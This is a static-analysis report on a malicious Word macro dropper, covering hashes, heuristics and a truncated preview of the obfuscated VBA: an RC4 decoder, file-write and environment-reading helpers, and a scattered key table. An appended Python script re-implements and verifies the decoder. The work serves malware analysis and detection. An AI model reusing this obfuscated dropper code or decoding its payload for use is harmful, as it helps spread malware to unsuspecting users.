Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 476c9d4383505429…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 64.0 KB
Created: 2018-04-18 22:29:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 33cd8c06a1bc8eff1e003935069d120a
SHA-1: f73e729642c0206c7eda6595bb98eb3d5304f0ec
SHA-256: 476c9d4383505429c10c31fb72f5218b3b42d985a2b46a0de62fd6ec5d08eebf
Risk score: 170

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1071.001 Application Layer Protocol: Web Protocols

The sample is a Word document whose VBA project contains obfuscated macros: randomized identifiers and a byte table assembled one element per statement. The extracted source shows a stream-cipher routine, c7C, that copies a caller-supplied 256-entry table into a working state and then runs the RC4 pseudo-random generation loop (i = i + 1, j = j + S[i], swap S[i] and S[j], keystream byte S[S[i] + S[j]], all reduced modulo 256), XORing each keystream byte into the data buffer; i472E14 implements XOR as (a And Not b) Or (Not a And b). There is no key-scheduling step because the macro ships the already-permuted state as the gCC3CF table, so the table itself is the key. Helper functions write arbitrary text to a file (Open ... For Output, Print #1) and read environment variables (Environ), and the heuristics additionally flag GetObject and CallByName, the usual pair for obtaining a COM object and invoking a method without its name appearing as a literal. The ClamAV signature Doc.Dropper.Agent-6517847-0 and the ATT&CK tags are consistent with dropper behaviour: decode a second-stage payload, write it to disk and execute it.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6517847-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6517847-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the DrawingML XML namespace that Office writes into documents carrying drawing objects; it is expected content, not a network indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   9189 bytes
SHA-256: cf56c83e707b9ee2d94dc5a43db6b0ccbe11da56e6254f29388296a7ccb204e2
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "InkEdit1, 0, 0, INKEDLib, InkEdit"
Dim i41BE
Private Function c7C(o05() As Byte, oB2E104(), yFD79A)
On Error Resume Next
Dim hBD7(0 To 255), f9DCD1, l283, g3B, k39 As Byte
For f9DCD1 = 0 To 255
hBD7(f9DCD1) = oB2E104(f9DCD1)
Next
f9DCD1 = 0
For f9DCD1 = 0 To yFD79A
l283 = n666FC7((l283 + 1), 256)
g3B = n666FC7((g3B + hBD7(l283)), 256)
k39 = hBD7(l283)
hBD7(l283) = hBD7(g3B)
hBD7(g3B) = k39
o05(f9DCD1) = i472E14(o05(f9DCD1), (hBD7(n666FC7((hBD7(l283) + hBD7(g3B)), 256))))
Next f9DCD1
c7C = StrConv(o05, 64)
End Function
Private Function bCEAD(qF23, zFC8B4)
Open qF23 For Output As #1
Print #1, zFC8B4
Close #1
End Function
Private Function i472E14(k9DA6B, r7C1)
i472E14 = (k9DA6B And Not r7C1) Or (Not k9DA6B And r7C1)
End Function
Private Function mA93D2(gB08150)
mA93D2 = Environ(gB08150)
End Function
Sub iADA19()
Dim o8F2EE(5) As Byte
o8F2EE(4) = 55
o8F2EE(2) = 48
o8F2EE(1) = 65
o8F2EE(3) = 56
o8F2EE(5) = 54
o8F2EE(0) = 48
Dim gCC3CF(254) As Byte
gCC3CF(65) = 126
gCC3CF(143) = 131
gCC3CF(28) = 246
gCC3CF(95) = 5
gCC3CF(232) = 35
gCC3CF(181) = 244
gCC3CF(223) = 70
gCC3CF(184) = 212
gCC3CF(41) = 31
gCC3CF(137) = 110
gCC3CF(166) = 169
gCC3CF(57) = 35
gCC3CF(64) = 165
gCC3CF(46) = 5
gCC3CF(217) = 161
gCC3CF(128) = 123
gCC3CF(185) = 154
gCC3CF(136) = 1
gCC3CF(2) = 198
gCC3CF(12) = 107
gCC3CF(147) = 140
gCC3CF(18) = 77
gCC3CF(9) = 114
gCC3CF(14) = 169
gCC3CF(97) = 138
gCC3CF(218) = 237
gCC3CF(173) = 228
gCC3CF(53) = 98
gCC3CF(179) = 202
gCC3CF(63) = 24
gCC3CF(145) = 134
gCC3CF(235) = 227
gCC3CF(100) = 164
gCC3CF(59) = 167
gCC3CF(16) = 157
gCC3CF(133) = 195
gCC3CF(160) = 46
gCC3CF(183) = 210
gCC3CF(11) = 114
gCC3CF(104) = 212
gCC3CF(7) = 138
gCC3CF(119) = 216
gCC3CF(191) = 140
gCC3CF(244) = 109
gCC3CF(88) = 4
gCC3CF(91) = 233
gCC3CF(24) = 104
gCC3CF(106) = 58
gCC3CF(30) = 16
gCC3CF(114) = 151
gCC3CF(20) = 167
gCC3CF(192) = 44
gCC3CF(153) = 120
gCC3CF(155) = 4
gCC3CF(225) = 85
gCC3CF(161) = 99
gCC3CF(125) = 79
gCC3CF(197) = 91
gCC3CF(205) = 216
gCC3CF(89) = 96
gCC3CF(0) = 70
gCC3CF(110) = 186
gCC3CF(249) = 213
gCC3CF(8) = 145
gCC3CF(105) = 22
gCC3CF(108) = 14
gCC3CF(126) = 116
gCC3CF(1) = 180
gCC3CF(54) = 4
gCC3CF(10) = 213
gCC3CF(15) = 2
gCC3CF(214) = 85
gCC3CF(107) = 194
gCC3CF(90) = 146
gCC3CF(6) = 209
gCC3CF(5) = 77
gCC3CF(19) = 53
gCC3CF(222) = 78
gCC3CF(233) = 77
gCC3CF(39) = 139
gCC3CF(240) = 109
gCC3CF(208) = 51
gCC3CF(247) = 50
gCC3CF(149) = 206
gCC3CF(51) = 161
gCC3CF(229) = 223
gCC3CF(203) = 86
gCC3CF(167) = 31
gCC3CF(44) = 229
gCC3CF(81) = 86
gCC3CF(66) = 253
gCC3CF(226) = 51
gCC3CF(40) = 150
gCC3CF(210) = 227
gCC3CF(79) = 77
gCC3CF(115) = 73
gCC3CF(98) = 86
gCC3CF(101) = 154
gCC3CF(162) = 244
gCC3CF(220) = 115
gCC3CF(94) = 205
gCC3CF(58) = 76
gCC3CF(238) = 168
gCC3CF(228) = 128
gCC3CF(123) = 46
gCC3CF(42) = 167
gCC3CF(144) = 69
gCC3CF(158) = 192
gCC3CF(4) = 111
gCC3CF(72) = 250
gCC3CF(17) = 243
gCC3CF(99) = 23
gCC3CF(177) = 111
gCC3CF(71) = 245
gCC3CF(224) = 91
gCC3CF(86) = 117
gCC3CF(172) = 192
gCC3CF(78) = 67
gCC3CF(159) = 169
gCC3CF(50) = 228
gCC3CF(25) = 57
gCC3CF(170) = 183
gCC3CF(178) = 113
gCC3CF(174) = 139
gCC3CF(234) = 119
gCC3CF(142) = 116
gCC3CF(129) = 119
gCC3CF(87) = 185
gCC3CF(85) = 224
gCC3CF(67) = 52
gCC3CF(118) = 5
gCC3CF(189) = 5
gCC3CF(248) = 23
gCC3CF(56) = 138
gCC3CF(60) = 115
gCC3CF(165) = 59
gCC3CF(37) = 210
gCC3CF(62) = 187
gCC3CF(198) = 33
gCC3CF(84) = 236
gCC3CF(168) = 238
gCC3CF(227) = 25
gCC3CF(152) = 37
gCC3CF(213) = 168
gCC3CF(242) = 234
gCC3CF(243) = 126
gCC3CF(176) = 224
gCC3CF(70) = 65
gCC3CF(29) = 241
gCC3CF(236) = 44
gCC3CF(141) = 117
gCC3CF(237) = 187
gCC3CF(45) = 169
gCC3CF(75) = 123
gCC3CF(
... (truncated)
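Analyst note, added here and not part of the original report or of the sample: the Python below re-implements the c7C/i472E14 routine from the preview so its behaviour can be checked offline, together with a small parser that rebuilds a macro byte table from the scattered `name(idx) = value` assignments. Assumptions: the helper n666FC7, whose body lies beyond the truncated preview, is taken to be modulo 256 (it is applied exactly where RC4 reduces its indices); the 255-element gCC3CF table (Dim gCC3CF(254)) leaves state slot 255 Empty when c7C copies 0..255 under On Error Resume Next, modelled here as 0; and because the full table is not on the page, the routine is validated against the public RC4 test vector (key "Key", plaintext "Plaintext", ciphertext BBF316E8D940AF0AD3) rather than against the sample's own data. The o8F2EE lines are copied from the preview; the RC4 key-scheduling function exists only to build a known-good state for that check and is not something the macro does.

```python
"""Re-implementation of the decoder in the extracted macro (analyst example)."""
import re

# Lines copied from the macro preview: the six-byte o8F2EE table.
O8F2EE_SOURCE = """
Dim o8F2EE(5) As Byte
o8F2EE(4) = 55
o8F2EE(2) = 48
o8F2EE(1) = 65
o8F2EE(3) = 56
o8F2EE(5) = 54
o8F2EE(0) = 48
"""

_ASSIGN = re.compile(r"^\s*(\w+)\((\d+)\)\s*=\s*(\d+)\s*$")
_DIM = re.compile(r"^\s*Dim\s+(\w+)\((\d+)\)\s+As\s+Byte\s*$", re.IGNORECASE)


def parse_byte_table(vba_source: str, name: str) -> list[int]:
    """Rebuild 'Dim name(N) As Byte' from its scattered 'name(i) = v' lines.

    VBA's Dim name(N) declares N+1 elements (0..N); Byte elements that are
    never assigned stay 0, which is what the macro relies on for the gaps
    in gCC3CF.
    """
    size = None
    values = {}
    for line in vba_source.splitlines():
        m = _DIM.match(line)
        if m and m.group(1) == name:
            size = int(m.group(2)) + 1
            continue
        m = _ASSIGN.match(line)
        if m and m.group(1) == name:
            values[int(m.group(2))] = int(m.group(3)) & 0xFF
    if size is None:
        raise ValueError(f"no 'Dim {name}(...) As Byte' in source")
    return [values.get(i, 0) for i in range(size)]


def rc4_ksa(key: bytes) -> list[int]:
    """Standard RC4 key scheduling. The macro does NOT do this; it ships the
    permuted state directly. Used here only to build a known-good state."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def c7c(data: bytes, table: list[int], last_index: int) -> bytes:
    """Mirror of c7C(o05, oB2E104, yFD79A) from the macro.

    - c7C copies oB2E104(0..255) into a fresh state under On Error Resume
      Next, so a missing entry (index 255 of the 255-element gCC3CF) stays
      Empty, which VBA arithmetic treats as 0.
    - The loop is 'For i = 0 To yFD79A', so last_index is inclusive.
    - Reading o05(i) past the buffer is swallowed by the same handler: the
      keystream still advances, but no byte is written.
    - Assumption: n666FC7(x, 256) is x Mod 256 (its body is not in the
      preview); i472E14 is (a And Not b) Or (Not a And b), i.e. XOR.
    """
    state = [table[k] if k < len(table) else 0 for k in range(256)]
    out = bytearray(data)
    i = j = 0                      # l283 and g3B start as Empty (0)
    for n in range(last_index + 1):
        i = (i + 1) & 0xFF
        j = (j + state[i]) & 0xFF
        state[i], state[j] = state[j], state[i]
        keystream = state[(state[i] + state[j]) & 0xFF]
        if n < len(out):
            out[n] ^= keystream
    return bytes(out)


def rc4_test_vector_ok() -> bool:
    """Run c7c with a genuine RC4 state against the public test vector
    (key 'Key', plaintext 'Plaintext', ciphertext BBF316E8D940AF0AD3)."""
    ct = bytes.fromhex("BBF316E8D940AF0AD3")
    return c7c(ct, rc4_ksa(b"Key"), len(ct) - 1) == b"Plaintext"


if __name__ == "__main__":
    print("c7C is the RC4 PRGA:", rc4_test_vector_ok())
    print("o8F2EE bytes:", bytes(parse_byte_table(O8F2EE_SOURCE, "o8F2EE")))
```

The test-vector check passing is the evidence that c7C is RC4's output loop and not a custom XOR scheme, which matters for hunting: the same routine with a different shipped table will not match a byte signature on the table, but it will match a YARA rule on the loop structure (the modulo-256 index updates, the swap, and the (And Not)/(Not And) XOR idiom). The six o8F2EE bytes parse to the ASCII string "0A0876"; what the macro uses it for (file name, marker or key fragment) cannot be determined from the truncated preview, so it is reported here as data only. To decode the sample's real payload, run parse_byte_table over the complete macros.bas for gCC3CF and pass the result as the table argument.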